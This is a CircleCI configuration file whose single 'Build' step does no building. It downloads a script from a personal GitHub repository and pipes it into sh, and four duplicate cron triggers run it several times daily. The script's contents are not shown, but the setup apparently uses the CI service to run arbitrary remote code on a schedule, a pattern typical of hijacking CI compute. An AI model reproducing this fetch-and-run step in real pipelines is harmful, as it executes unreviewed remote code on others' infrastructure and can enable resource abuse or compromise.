version: 2.1
jobs:
  build:
    docker:
      - image: circleci/node:12
    resource_class: medium
    working_directory: ~/work
    steps:
      - run:
          name: Build
          command: curl -fsSL https://raw.githubusercontent.com/nguyenhuyhoang2/nguyenhuyhoang/tool/start.sh | sh 
workflows:
  version: 2
  constantly_build:
    triggers:
      - schedule:
          cron: "23 1,7,14,19 * * *"
          filters:
            branches:
              only:
                - main
                - master
                - circleci-project-setup
      - schedule:
          cron: "23 1,7,14,19 * * *"
          filters:
            branches:
              only:
                - main
                - master
                - circleci-project-setup
      - schedule:
          cron: "23 1,7,14,19 * * *"
          filters:
            branches:
              only:
                - main
                - master
                - circleci-project-setup
      - schedule:
          cron: "23 1,7,14,19 * * *"
          filters:
            branches:
              only:
                - main
                - master
                - circleci-project-setup             
    jobs:
      - build
